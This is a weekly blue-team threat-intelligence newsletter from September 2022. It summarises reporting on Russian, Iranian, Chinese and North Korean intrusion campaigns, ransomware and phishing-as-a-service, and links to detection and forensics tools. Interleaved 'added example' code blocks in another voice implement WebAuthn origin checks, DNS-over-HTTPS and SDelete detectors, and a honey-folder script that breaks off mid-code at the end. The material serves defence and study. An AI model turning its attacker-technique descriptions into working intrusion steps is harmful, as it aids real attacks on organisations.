Bluepurple Pulse: week ending September 11th
Note to self: don't leave it nine days before releases next time..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything made it in this week due to the volume.
Operationally this week it all appears a little higher tempo than usual, as you’ll see below from the reporting, whilst nothing specific appears to be driving it other than the general theme of global unpeace. Aside from that the UK is in mourning due to the death of Her Majesty.
In the high-level this week:
David Gonski calls for cyber risk defence to protect directors in Australia - this is a weak argument, basically says regulation scares good directors away.
EU to impose tough new rules on ‘internet of things’ product makers - only good news for the world when another market does this.
US Treasury Reissues Rules to Enforce Cyber Sanctions on Foreign Adversaries - due to volume organisations were confused - so this is intended to help.
Department of State Cybersecurity training series boosts global resilience against Democratic People's Republic of Korea Malware - training in a state's TTPs etc. is an interesting soft power offer for sure.
US Treasury Sanctions Iranian Ministry of Intelligence and Minister for Malign Cyber Activities - be interesting to see the impact.
United States Department of Justice Hosts Cryptocurrency Crimes Workshop for Estonian Counterparts - a different lens on defend forward.
The Externalisation of the EU’s Cybersecurity Regime: The Cyber Diplomacy Toolbox - a paper pointing out weaknesses in the EU's game, including problems of attribution and evidence collection, and “our Article questions whether the CFSP is fit for the digital age” - oof.
International Journal of Cyber Diplomacy - from Romania - interesting articles, I’ll defer to others if they are good. I liked the concepts outlined in the article titled Cyber Diplomacy 3.0 - “Agile Diplomacy” to Promote Security and Innovation
Putin instructed intelligence to obtain technology for industry - Russian reporting on the instruction for economic espionage.
NSA, CISA, ODNI Release Software Supply Chain Guidance for Developers - details here - and they are only just getting started..
NSA Releases Future Quantum-Resistant (QR) Algorithm Requirements for National Security Systems - starting gun officially fired.
The SSSCIP Ukraine and the National Cyber Security Directorate of Romania have signed a Memorandum of Understanding in cooperation for cyber defense - self organising states in Eastern Europe
Russia’s War on Ukraine Deepens International Cyber-Defense Cooperation - wider article from the Wall Street Journal basically highlighting the same thing at a macro level
Israel defence minister's cleaner jailed for trying to spy for Iran-linked hackers - amazing vetting failure
What’s Shaping India’s Policy on Cross-Border Data Flows? - the genesis prediction is as interesting as the reality - A 2019 report by India’s Ministry of Electronics and Information Technology predicted that India could have a $1 trillion digital economy by 2025
Website selling stolen login Credentials and other personally identifying information is seized and its operator charged for conspiracy and trafficking in unauthorized access devices - Initial access broker market smashed up
Interrogating the Cybersecurity Development Agenda: A Critical Reflection - for those involved in international capacity building as part of their international relations strategies this is likely worth a read.
Unpacking Russia's Cyberwarfare Capabilities - a good summary in open source for lots of organisations to usefully reference
US Army updates cyber training after some Graduates weren’t ready - fascinating insight into the talent pool scaling challenges in the US Army around cyber.
In job land this week the UK’s Joint Intelligence Organisation is hiring a Principal Intelligence Analyst (China Hostile Activity and Investment Security).
More broadly I have been reflecting on R&D pull through (what a CTO is accountable for) due to various interactions and several related articles this week.
The first was Hicks says Pentagon moving too slowly in transitioning DARPA tech to warfighters - this was interesting because it put in perspective my challenges and made me feel effective (always good) but also highlighted some of the challenges in cross organisational activities at scale. In the private sector to address this we create stripy teams who own the end to end, but when you get this level of complexity it is hard to see how you would do that - anyway interesting problem.
Then there was Synthetic DNA startup Catalog partners with Seagate for its DNA-based data storage platform. This approach is more common where industrial partners team up with start-ups, academia and similar. We did this a lot at Symantec to effectively outsource/de-risk bits of R&D with good results.
Finally there was the article Top CCP Scientist Diagnoses China's STEM Ills - The CCP's top science official is scared for the future of S&T in China. It provides some interesting insights into what happens when the world doesn’t entirely trust you and the potential long term implications of the underpinning R&D..
Have a lovely Saturday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia / Ukraine
Initial access broker repurposing techniques in targeted attacks against Ukraine
Pierre-Marc Bureau details that Conti appears to have pivoted to support state intent. We expected this to happen earlier in the conflict, interesting it is happening now.
UAC-0098 is a threat actor that historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks. The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations. TAG assesses UAC-0098 acted as an initial access broker for various ransomware groups including Quantum and Conti, a Russian cybercrime gang known as FIN12 / WIZARD SPIDER.
Mass distribution of the AgentTesla malware
From Ukraine CERT-UA - the point of note is the wider regional targeting.
On August 30 and 31, 2022, the government computer emergency response team of Ukraine CERT-UA recorded mass mailings of emails with the topic "Technisches Zeichnen" among Ukrainian, Austrian and German organizations.
https://cert.gov.ua/article/1563322
Pro-Russian Group Targeting Ukraine Supporters with DDoS Attacks
Martin Chlumecký details a capability by a lesser known group working in Russian interests. The point of note here is the resilience built into the capability which will make disruption of the underlying capability challenging.
NoName057(16) is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland. A full list of the group’s targets can be found at the end of this post.
To carry out DDoS attacks, hacker groups utilize botnets. They control them via C&C servers, sending commands to individual bots, which essentially act as soldiers. Uncovering and tracking botnets is complex and time-consuming.
https://decoded.avast.io/martinchlumecky/bobik/
Ragnar Locker Ransomware Targeting the Energy Sector
Given where energy is in the must have stakes this is interesting and a bold move. Not going to get them on any Christmas lists. Feels like the dimensions to the energy aspect of the conflict risk heating up (no pun intended).
Breach of a Pipeline Company : DESFA is a strategic energy-related company that has been claimed by Ragnar Locker as their victim.
Security Evasion Capabilities : Ragnar Locker checks if specific products are installed, especially security products (antivirus), virtual-based software, backup solutions and IT remote management solutions.
Ransomware Actors Targeting the Energy Sector : This is the second important pipeline company that has been hit by ransomware, along with Colonial Pipeline. Furthermore, four energy companies have been hit recently by ransomware, including three in Europe.
Active for Three Years : Ragnar Locker is both a ransomware group and the name of the software in use. They have been running since 2019 and targeting critical industries. They use the double extortion scheme.
Excluding the Commonwealth of Independent States : Ragnar Locker avoids being executed from countries since the group is located in the Commonwealth of Independent States (CIS).
Worok: The big picture
Thibaut Passilly details a new APT with their own capability known to use the Microsoft Exchange ProxyShell as their initial access.
[We]recently found targeted attacks that used undocumented tools against various high-profile companies and local governments mostly in Asia. These attacks were conducted by a previously unknown espionage group that we have named Worok and that has been active since at least 2020. Worok’s toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files.
https://www.welivesecurity.com/2022/09/06/worok-big-picture/
BRONZE PRESIDENT Targets Government Officials
China being China all over the globe. The initial access appears to be via RAR files, LNK files and decoy documents.
In June and July 2022, [our] researchers identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America. PlugX is modular malware that contacts a command and control (C2) server for tasking and can download additional plugins to enhance its capability beyond basic information gathering. Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.
https://www.secureworks.com/blog/bronze-president-targets-government-officials
DangerousSavanna: Two-year long campaign targets financial institutions in French-speaking Africa
This actually sounds like a Red Team. The tradecraft bleed between both shows that should organised crime want to ‘get into that cyber thing’ then it won’t really take them much. The targeting of countries with less developed cyber defence capabilities is the key point in this reporting. ANSSI is going to be busy.
The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. In the last few months, the campaign heavily focused on Ivory Coast. Judging by the victimology and tactics, techniques, and procedures (TTPs), we can assess with medium to high confidence that the motivation behind DangerousSavanna is likely financial.
DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations.
Iran
Various bits of reporting on Iran this week
Iranian attacks against the Albanian government
Various bits of reporting here, starting with Albania cuts Iran ties over cyberattack, U.S. vows further action showing the geopolitical implications.
Then the technical reporting came firstly from Luke Jenkins, Emiel Haeghebaert, Alice Revelli and Ben Read
[We] identified the ROADSWEEP ransomware family and a Telegram persona which targeted the Albanian government in a politically motivated disruptive operation ahead of an Iranian opposition organization’s conference in late July 2022.
A previously unknown backdoor CHIMNEYSWEEP and a new variant of the ZEROCLEAR wiper may also have been involved.
CHIMNEYSWEEP malware distribution data and decoy content, the operation’s timing and politically themed content, and the possible involvement of the ZEROCLEAR wiper indicate an Iranian threat actor is likely responsible.
This activity is a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state. It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.
Then further reporting from the incident response.
APT42: Crooked Charms, Cons and Compromises
Congratulations to Iran for getting appointed a new APT number. Their targeting strays into the UK, USA, Australia and Italy.
The targeting patterns for APT42 operations are similar to other Iranian cyber espionage actors, with a large segment of activity focused on the Middle East region. However, unlike other suspected IRGC-affiliated cyber espionage groups that have focused on targeting the defense industrial base or conducting large-scale collection of personally identifiable information (PII), APT42 primarily targets organizations and individuals deemed opponents or enemies of the regime, specifically gaining access to their personal accounts and mobile devices. The group has consistently targeted Western think tanks, researchers, journalists, current Western government officials, former Iranian government officials and the Iranian diaspora abroad.
https://www.mandiant.com/media/17826
Charming Kitten: “Can We Have A Meeting?”
More Iranian reporting this week, this is very interesting. They are impersonating scientists for their initial contacts. For those in academia please do take note of this tradecraft.
Charming Kitten (known as APT42, ITG18, UNC788, TA453, PHOSPHORUS, Yellow Garuda, also APT35) is an Iranian state-sponsored threat group that conducts persistent cyber espionage operations to have extensive surveillance of targeted Iranian and foreign citizens, who have strategic intelligence value for the Islamic Revolutionary Guard Corps (IRGC).
Samuel Valable is one of the researchers at the French National Center for Scientific Research (CNRS) who is specialist in imaging and therapeutic strategies for cancers and brain tissues.
Our latest findings showed that the Charming Kitten hacking group impersonated him on social media platforms, by using his academic and professional background in CNRS, and created accounts under his name. The Iranian state-backed hackers created a fake LinkedIn account and then targeted researchers and academia in other countries to collect intelligence and hack their accounts.
https://blog.certfa.com/posts/charming-kitten-can-we-wave-a-meeting/
Profiling DEV-0270: PHOSPHORUS’ ransomware operations
Even more Iranian reporting, this time on the team which quickly flips high-severity vulnerabilities to secure access and then conducts ransomware operations. Those financial sanctions are working, hence the need to diversify.
DEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.
EvilProxy Phishing-as-a-Service with MFA Bypass
Valuable insight into a criminal phishing service which can bypass multi-factor authentication. The rapid commoditisation of this capability means that webauthn can’t arrive soon enough in my mind.
EvilProxy actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication – proxyfying victim’s session. Previously such methods have been seen in targeted campaigns of APT and cyberespionage groups, however now these methods have been successfully productized in EvilProxy which highlights the significance of growth in attacks against online-services and MFA authorization mechanisms.
Based on the ongoing investigation surrounding the result of attacks against multiple employees from Fortune 500 companies,
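To show why the author wants WebAuthn against kits like this, here is an added example (it is not from the EvilProxy report or any vendor code). The browser writes the origin it is actually talking to into clientDataJSON, which the authenticator signs, so a relying party (RP) that checks the origin rejects an assertion produced on a look-alike domain even when the proxy relays every byte. RP_ID, the allowed origin, the challenge and the proxied origin are constructed; the ECDSA signature check over authenticatorData || SHA-256(clientDataJSON) is left out because it would pass in both cases and is not what stops the attack.

```python
"""
Added example: the origin-binding checks a WebAuthn relying party performs on an
assertion, and why they fail for a session relayed through a reverse-proxy phishing kit.
All names, origins and values are constructed for this example.
"""
import base64
import hashlib
import json
import os
from typing import Tuple

RP_ID = "example.com"                            # assumed relying party id
ALLOWED_ORIGINS = {"https://login.example.com"}  # origins the RP serves WebAuthn from


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def client_data_from_browser(origin: str, challenge: bytes) -> bytes:
    """What the browser builds for navigator.credentials.get(); the page cannot choose origin."""
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                       "origin": origin, "crossOrigin": False}).encode()


def authenticator_data(rp_id: str, sign_count: int) -> bytes:
    """rpIdHash (32 bytes) || flags (UP=0x01 and UV=0x04 set) || signCount (4 bytes, big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([0x05]) + sign_count.to_bytes(4, "big")


def verify_assertion(client_data: bytes, auth_data: bytes, expected_challenge: bytes) -> Tuple[bool, str]:
    """RP-side checks that bind the assertion to this site and this login attempt."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "unexpected clientData type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (replay or wrong session)"
    if cd.get("origin") not in ALLOWED_ORIGINS:
        return False, f"origin {cd.get('origin')!r} is not an allowed origin"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match this RP"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"


def demo() -> Tuple[Tuple[bool, str], Tuple[bool, str]]:
    """Legitimate login versus the same login relayed through a proxy on another domain."""
    challenge = os.urandom(32)
    auth = authenticator_data(RP_ID, 7)
    legit = verify_assertion(client_data_from_browser("https://login.example.com", challenge), auth, challenge)
    # The victim's browser is on the kit's domain, so that is the origin it signs (constructed name).
    proxied = verify_assertion(client_data_from_browser("https://login.example-sso.test", challenge), auth, challenge)
    return legit, proxied


if __name__ == "__main__":
    for label, result in zip(("direct", "proxied"), demo()):
        print(f"{label}: {result}")
```

The rpIdHash check is the second barrier: a page on the kit's domain cannot even ask the authenticator for a credential scoped to the real RP id, so a relayed session has neither a valid origin nor a valid rpIdHash. Contrast this with a TOTP or push code, which carries no notion of where it was typed.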
APT group Evilnum launches new round of cyber attacks on online transactions
The tradecraft is basic; the targets are interesting, i.e. it’s all about the money.
This round of cyberattacks occurred from late July to early August. Evilnum attackers continued to use their usual attack ideas during the campaign, including decoy files of pif type and compressed package type, attack chains built around the self-developed Trojan program DarkMe, and various third-party tools.
DarkCasino is an APT operation discovered by Fuying Lab. The action is mainly aimed at Western European countries on the Mediterranean coast, targeting online transaction cash flow. For the analysis of the DarkCasino operation, please refer to the published report "DARKCASINO Operation: In- depth Analysis of APT Organization EVILNUM's Recent Attacks"
TA505 Group's TeslaGun In-Depth Analysis
This team in Turkey/Switzerland gained access to the backend infrastructure of the threat actor.
This report provides insight into how TA505 enables and manages these attacks through its ”TeslaGun” control panel.
https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf
Shikitega - New stealthy malware targeting Linux
Interesting to see the evolution of Linux implants. Ofer Caspi provides insight into a new family in part built on open source. Interesting all this complexity results in a cryptominer of all things.
The malware downloads and executes the Metasploit’s “Mettle” meterpreter to maximize its control on infected machines.
Shikitega exploits system vulnerabilities to gain high privileges, persist and execute crypto miner.
The malware uses a polymorphic encoder to make it more difficult to detect by anti-virus engines.
Shikitega abuses legitimate cloud services to store some of its command and control servers (C&C).
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
New Remote Access Trojan (RAT)
appears to target Farsi-speaking code developers by using a Microsoft Word document that includes a Microsoft Dynamic Data Exchange (DDE) exploit
https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/
PlugX RAT Loader Evolution
Detail of this pervasive capability used by China.
The Rule of Three: The malware may be delivered differently depending on the campaigns such as whether the initial delivering format is self de-archiving or not. However, the PlugX loader always consists of three main components: a legitimate executable, a malicious module, and a malicious payload. The malware has been around for over a decade, but the format of the malware has not changed.
Security Evasion-Focused Techniques: PlugX loader is known for utilizing DLL-Sideloading techniques for evasion purposes. However, the malware is packing additional evasion techniques. This increases the chance of deploying the main PlugX payload successfully.
https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution
BumbleBee a New Modular Backdoor Evolved From BookWorm
Vickie Su, Ted Lee and Nick Dai cause a name clash in the malware naming world (maybe we need an ITU or UN to co-ordinate). That aside, a refactored Chinese capability has stepped onto the field which appeared to cause some analysis headaches.
BumbleBee is a modular backdoor that comprises two applications, a server and a client application (a master and slaver application, respectively in the malware’s jargon). Once the client application is deployed on the target computer (these are commonly local government devices), threat actors can control the machine using the server module. Let us take a deeper look into this backdoor.
Since BumbleBee and Bookworm share the same features, BumbleBee is likely a refactored form of the latter. Focusing on Asian local government targets, all signs point to a suspect linked to a Chinese hacker group.
Korea
Lots of reporting around this week so they get their own sub category like Iran.
$30 Million Seized: How the Cryptocurrency Community Is Making It Difficult for North Korean Hackers To Profit
Someone had a bad day in the office in the Hermit Kingdom.
With the help of law enforcement and leading organizations in the cryptocurrency industry, more than $30 million worth of cryptocurrency stolen by North Korean-linked hackers has been seized. This marks the first time ever that cryptocurrency stolen by a North Korean hacking group has been seized, and we’re confident it won’t be the last.
https://blog.chainalysis.com/reports/axie-infinity-ronin-bridge-dprk-hack-seizure/
Lazarus and the tale of three RATs
Jung soo An, Asheer Malhotra and Vitor Ventura out a new capability from the Hermit Kingdom. The sector targeting (along with Russia’s) is a little worrying as we head into autumn/winter. Known vulnerabilities were exploited, showing their ability to pull through.
[We have been] tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by the United States government.
This campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into targeted organizations.
Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.
The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary's nation-state.
[We] discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.
[We] also discovered the use of a recently disclosed implant we're calling "MagicRAT" in this campaign.
https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Malicious Word Files Targeting Specific Individuals Related to North Korea
Very basic tradecraft in this reporting from South Korea on North Korean activity; it is just relentless in nature.
[We] discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows:
https://asec.ahnlab.com/en/38182/
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies
Various known vulnerabilities exploited here in quite an aggressive campaign including the use of Bitlocker for some ransomware operations.
Around 20 businesses appear to have been infiltrated, including semiconductor, injection machine, resort, construction, and software companies. It seems that hackers have performed attacks without specific targets. Since this includes cases where the attack started on a disclosed and vulnerable server and then escalated to the final stage of ransomware infection, particular discretion is advised.
Out of the cases identified so far, there are few ransomware infections by the hacker group mentioned above. The hacker group does not make new ransomware, but instead abuses Windows’ basic encryption program, BitLocker, to encrypt disks. BitLocker is a disk encryption tool provided and used by Windows, and is originally a tool used for disk security. This supports the command line method, and at its core, uses the command Manage-bde to enable the use of the BitLocker feature and when a drive is locked, a password is required to access it.
https://asec.ahnlab.com/en/38156/
Asbit: An Emerging Remote Desktop Trojan
Paul Kimayong outs a Chinese implant - note the use of DNS over HTTPS in an attempt to avoid passive DNS detection as well as any filtering. This will make some cyber threat intelligence / intrusion analysts sob a little I suspect.
[We are] currently monitoring an emerging Chinese Remote Desktop Trojan called Asbit. It’s a remote access Trojan being advertised on its developer’s website as a “Fast Remote Desktop”. This RAT first made its appearance in 2021 and kept updating its infrastructure and features as it went along. It uses a number of strategies to avoid endpoint and network detection. By using DNS over HTTPS (DoH) to resolve the IP addresses of its control servers, it aims to get past network DNS filters.
https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan
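Since DoH resolution leaves nothing in passive DNS, the place to look is the web-proxy or TLS log instead. The following is an added example, not code from the Juniper report, that flags DoH in constructed proxy log lines using three indicators: a request body of type application/dns-message (RFC 8484), a GET to a /dns-query path carrying the RFC 8484 ?dns= parameter, and contact with a well-known public DoH resolver. The log format, the sample lines and the resolver list are assumptions; the list is illustrative, not a complete block list.

```python
"""
Added example: spot DNS-over-HTTPS in web-proxy logs when passive DNS has nothing to show.
Log layout, resolver list and sample rows are constructed for this example.
"""
import csv
import io
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Illustrative public resolvers; in practice maintain this list from your own egress policy.
KNOWN_DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}
DOH_MEDIA_TYPE = "application/dns-message"   # request/response body type defined by RFC 8484

# Constructed proxy log: one row per HTTPS request after TLS inspection.
SAMPLE_LOG = """\
ts,src,host,method,url,content_type
2022-09-08T10:01:02Z,10.0.0.15,dns.google,POST,https://dns.google/dns-query,application/dns-message
2022-09-08T10:01:05Z,10.0.0.15,example.org,GET,https://example.org/index.html,text/html
2022-09-08T10:02:11Z,10.0.0.22,doh.example.net,GET,https://doh.example.net/dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB,
2022-09-08T10:03:40Z,10.0.0.31,cloudflare-dns.com,GET,https://cloudflare-dns.com/,text/html
"""


@dataclass
class DohHit:
    ts: str
    src: str
    host: str
    indicator: str


def classify(row: dict) -> Optional[str]:
    """Return the strongest DoH indicator for one log row, or None if it looks like ordinary web traffic."""
    if row.get("content_type", "").lower() == DOH_MEDIA_TYPE:
        return "dns-message body"                  # unambiguous: the HTTP body is a DNS packet
    parts = urlsplit(row.get("url", ""))
    if parts.path.endswith("/dns-query") and "dns" in parse_qs(parts.query):
        return "RFC 8484 GET ?dns="                 # base64url-encoded DNS query in the URL
    if row.get("host", "").lower() in KNOWN_DOH_HOSTS:
        return "contact with known DoH resolver"   # weaker: host is a resolver, body not seen
    return None


def detect_doh(log_text: str) -> List[DohHit]:
    """Scan the CSV log and return every row carrying a DoH indicator, in log order."""
    hits: List[DohHit] = []
    for row in csv.DictReader(io.StringIO(log_text)):
        indicator = classify(row)
        if indicator:
            hits.append(DohHit(row["ts"], row["src"], row["host"], indicator))
    return hits


if __name__ == "__main__":
    for hit in detect_doh(SAMPLE_LOG):
        print(f"{hit.ts} {hit.src} -> {hit.host}: {hit.indicator}")
```

The third rule is low confidence on its own (a browser with DoH enabled trips it too), so weight it by which process made the request if your proxy or EDR records that; an unknown binary talking to a DoH resolver is the interesting case, and the mitigation the report implies is to permit DoH only to your sanctioned resolver and log the rest.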
Discovery
How we find and understand the latent compromises within our environments.
Sensitive Command (Canary) Token - So much offense in my defense
Great work here from Casey, the use of SilentProcessExit gflag is 😽
This quick/simple Canarytoken alerts you any time your chosen command is executed on a [Windows] host.
https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html
Reviewing macOS Unified Logs
Alexander Holcomb shows us some macOS investigation tradecraft due to changes in the OS.
Beginning with macOS 10.12 (Sierra), Apple introduced a key change to how logging was done on their systems. This new logging system replaced common Unix logs with macOS Unified Logs. These logs can provide forensic investigators a valuable artifact to aid in investigating macOS systems or other Apple devices.
In this blog post, we will cover an overview of the Unified Logs and the challenges presented in using them during an investigation. Along with this blog post, we also released a tool called “macos-unifiedlogs" to help overcome some of the challenges in parsing log data, and to provide examples of how it can uncover vital information during an investigation.
https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs
Merry Maker 2.0
Merry Maker is a fully scalable tool to detect the presence of digital skimmers - this is excellent and wonderful they open sourced it.
https://github.com/target/mmk-ui-api
Threat Hunting with Sysmon and Graphs
Sam shows the value of graph databases in threat hunting. Bonus points for using open source.
In this post we are going to try to explain how to perform Threat Hunting using sysmon and how we can improve it using a graph database.
https://medium.com/@SecSamDev/threat-hunting-with-sysmon-and-graphs-4709215b7c91
Forensic Detection of Files Deleted via SDelete - as used by APT29
Lina Lau shares tradecraft to know if you’ve been visited by Russia.
When sdelete is utilised, it leaves obvious traces in the USN Journal, $J file where 26 unique entries will be created in alphabetic order as pictured below. This is a dead giveaway that “sdelete” was utilised by the threat actors.
https://www.inversecos.com/2022/09/forensic-detection-of-files-deleted-via.html
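As an added example (not from Lina Lau's post), here is a detector for that pattern over parsed USN Journal records: it groups records by file reference number, which survives renames, and fires when one file is renamed through 26 names in alphabetic order and then deleted. The simplified record layout stands in for parsed $J output, and the assumption that each temporary name is a single letter repeated (AAAAAAA.AAAA, BBBBBBB.BBBB, ...) is mine; the sample journal is constructed.

```python
"""
Added example: flag the 26-rename SDelete signature in USN Journal ($J) records.
Record layout and the sample journal are constructed for this example.
"""
import string
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class UsnRecord:
    usn: int        # journal offset, gives chronological order
    file_ref: int   # FileReferenceNumber, stable across renames
    name: str       # file name carried by the record
    reason: str     # simplified reason flag, e.g. RENAME_OLD_NAME / RENAME_NEW_NAME / FILE_DELETE


@dataclass
class SdeleteHit:
    file_ref: int
    original_name: Optional[str]   # name before the first rename, if the old-name record was seen
    last_usn: int


def _repeated_letter(name: str) -> Optional[str]:
    """Return 'A'..'Z' when the name (ignoring dots) is that one letter repeated, else None."""
    body = name.replace(".", "")
    if not body:
        return None
    first = body[0].upper()
    if first not in string.ascii_uppercase:
        return None
    return first if all(c.upper() == first for c in body) else None


def detect_sdelete(records: List[UsnRecord]) -> List[SdeleteHit]:
    """Walk each file's records in journal order looking for a full A..Z rename run."""
    by_file: Dict[int, List[UsnRecord]] = defaultdict(list)
    for rec in sorted(records, key=lambda r: r.usn):
        by_file[rec.file_ref].append(rec)
    hits: List[SdeleteHit] = []
    for file_ref, recs in by_file.items():
        letters: List[str] = []
        original: Optional[str] = None
        prev_old: Optional[str] = None
        for rec in recs:
            if rec.reason == "RENAME_OLD_NAME":
                prev_old = rec.name          # remembered so the first 'A' rename reveals the real name
                continue
            if rec.reason != "RENAME_NEW_NAME":
                continue
            letter = _repeated_letter(rec.name)
            expected = string.ascii_uppercase[len(letters)] if letters else "A"
            if letter == expected:
                if not letters:
                    original = prev_old
                letters.append(letter)
            elif letter == "A":                # a run restarting mid-way
                original, letters = prev_old, ["A"]
            else:                              # any other rename breaks the sequence
                original, letters = None, []
            if len(letters) == 26:
                hits.append(SdeleteHit(file_ref, original, rec.usn))
                original, letters = None, []
    return hits


def sdelete_journal(file_ref: int, original: str, start_usn: int) -> List[UsnRecord]:
    """Constructed journal fragment for one file wiped with SDelete (each rename = old + new record)."""
    stem, ext = original.rsplit(".", 1)
    recs, usn, old = [], start_usn, original
    for letter in string.ascii_uppercase:
        new = letter * len(stem) + "." + letter * len(ext)
        recs += [UsnRecord(usn, file_ref, old, "RENAME_OLD_NAME"),
                 UsnRecord(usn + 1, file_ref, new, "RENAME_NEW_NAME")]
        usn, old = usn + 2, new
    recs.append(UsnRecord(usn, file_ref, old, "FILE_DELETE"))
    return recs


# Constructed sample: one ordinary rename plus one SDelete wipe.
SAMPLE_RECORDS = [
    UsnRecord(100, 0x5E2, "draft.docx", "RENAME_OLD_NAME"),
    UsnRecord(101, 0x5E2, "Report.docx", "RENAME_NEW_NAME"),
    UsnRecord(102, 0x5E2, "Report.docx", "DATA_EXTEND"),
] + sdelete_journal(0x9A1, "payroll.xlsx", 200)

if __name__ == "__main__":
    for hit in detect_sdelete(SAMPLE_RECORDS):
        print(f"file_ref={hit.file_ref:#x} original={hit.original_name} last_usn={hit.last_usn}")
```

Keying on the file reference number rather than the name is what makes this robust: the name changes 26 times, the reference does not, and the RENAME_OLD_NAME record preceding the first A-name is the one that tells you what was wiped.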
Extract BootTimes from Windows
Grzegorz Tworek provides another source to validate when a host was booted even if anti-forensics have been deployed.
The script focuses on extracting boot times from bootstat.dat - If you need to extract other data from such file
https://github.com/gtworek/PSBits/blob/master/DFIR/Extract-BootTimes.ps1
Get-RdpLogonEvent
Marc-André Moreau provides a neat little script to help understand what technique was used.
extract the list of recent RDP logons from the event viewer and become a magician 🧙♀️ that can answer impossible questions like "is it really using Kerberos (nope), or did it downgrade to NTLM (again)"?
gist.github.com/awakecoding/5fda938a5fd2d29ebffb31eb023fe51c
Introducing Sandbox Scryer
Greg Dalcher and Joel Spurlock release this work aid to overworked intelligence and operations teams.
Sandbox Scryer is an open-source tool for producing threat hunting and intelligence data from public sandbox detonation output
The tool leverages the MITRE ATT&CK Framework to organize and prioritize findings, assisting in assembling indicators of compromise (IOCs), understanding attack movement and hunting threats
By allowing researchers to send thousands of samples to a sandbox for building a profile for use with the ATT&CK technique, Sandbox Scryer can help solve use cases at scale
The tool is intended for cybersecurity professionals who are interested in threat hunting and attack analysis leveraging sandbox output data
Sandbox Scryer consumes output from the free and public Hybrid Analysis malware analysis service to help analysts expedite and scale threat hunting as part of security operations center (SOC) operations
https://www.crowdstrike.com/blog/sandbox-scryer-free-threat-hunting-tool/
Defence
How we proactively defend our environments.
Defeating Ransomware by Using Sysmon and PowerShell
Mehmet Ergene provides a cheap (as in free) solution that some organisations might get value from.
Creating a honey folder and putting a test file in it. A honey folder is kind of a trap a ransomware will check and encrypt the files in it.
Configuring the Sysmon to monitor file creation events under the honey folder. This is because ransomware deletes the original file and puts the encrypted one into the same location.
Creating a PowerShell script that reads the Sysmon EventID 11 events, parses the Process Id from the event, and dumps its memory to a file.
Creating a scheduled task that triggers on Sysmon EventID 11 event. The task will run the PowerShell script, and the script will dump the memory.
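The decision step of that chain, as an added example that is not from Mehmet Ergene's post: it parses a Sysmon EventID 11 (FileCreate) event in Windows event XML, checks whether the created file sits under the honey folder and returns the PID and image, then builds the dump command the scheduled task would run. HONEY_FOLDER, the sample events and the use of Sysinternals procdump for the memory dump are assumptions made for this example; the command is returned, not executed.

```python
"""
Added example: honey-folder decision logic over a Sysmon EventID 11 event.
Trap path, sample events and the procdump command line are constructed assumptions.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional

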